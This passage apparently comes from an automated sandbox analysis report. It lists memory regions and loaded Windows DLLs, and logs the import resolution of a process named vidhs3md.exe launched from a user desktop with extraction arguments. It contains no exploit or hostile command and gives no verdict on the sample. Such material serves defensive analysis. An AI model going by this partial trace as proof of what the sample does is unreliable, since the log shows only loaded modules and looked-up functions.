0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6995 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6996 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6997 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6998 start_va = 0xa80000 end_va = 0xa83fff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 6999 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 7000 start_va = 0xcd0000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 7001 start_va = 0xa90000 end_va = 0xa93fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 7002 start_va = 0x4ec0000 end_va = 0x51f6fff entry_point = 0x4ec0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7003 start_va = 0xc70000 end_va = 0xc71fff entry_point = 0xc70000 region_type = mapped_file name = "cacls.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cacls.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cacls.exe.mui") Thread: id = 850 os_tid = 0x2ec Thread: id = 856 os_tid = 0x720 Process: id = "94" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x2bfd5000" os_pid = "0x2dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x578" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6852 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6853 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6854 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6855 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 6856 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 6857 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 6858 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 6859 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6860 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6861 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 6862 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 6863 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 6864 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6865 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6866 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6867 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 6868 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6869 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 6911 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 6912 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6913 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6914 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6915 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6916 start_va = 0x480000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6917 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6918 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6919 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6920 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6951 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6952 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6953 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6954 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6955 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6956 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6957 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 6958 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6959 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 6960 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6961 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6962 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6963 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6964 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 6965 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6966 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6967 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6968 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6969 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6970 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6971 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6972 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6973 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6974 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6975 start_va = 0x74380000 end_va = 0x74411fff entry_point = 0x74380000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 6976 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 6977 start_va = 0x6b0000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 6978 start_va = 0x2d0000 end_va = 0x2f9fff entry_point = 0x2d0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6979 start_va = 0x7b0000 end_va = 0x937fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 6980 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6981 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6982 start_va = 0x940000 end_va = 0xac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 6983 start_va = 0xad0000 end_va = 0x1ecffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 6984 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6985 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 6986 start_va = 0x2e0000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Thread: id = 851 os_tid = 0x5a0 [0267.167] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0267.167] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0267.167] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0267.167] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0267.167] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0267.167] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0267.167] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0267.168] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0267.168] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0267.168] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0267.168] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0267.168] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0267.168] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0267.168] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0267.169] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0267.170] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0267.171] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0267.172] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0267.173] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0267.173] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0267.174] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0267.174] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0267.174] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0267.174] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0267.175] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0267.175] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0267.175] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0267.175] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0267.175] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0267.175] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0267.175] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0267.175] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0267.175] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0267.175] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0267.175] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0267.175] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0267.175] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0267.175] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0267.175] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0267.176] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0267.176] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0267.176] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0267.176] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0267.176] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0267.176] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0267.176] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0267.176] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x4cbc625a, dwHighDateTime=0x1d45ac6)) [0267.176] GetCurrentThreadId () returned 0x5a0 [0267.176] GetCurrentProcessId () returned 0x2dc [0267.176] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=31463876328) returned 1 [0267.176] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0267.176] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0267.176] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0267.177] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 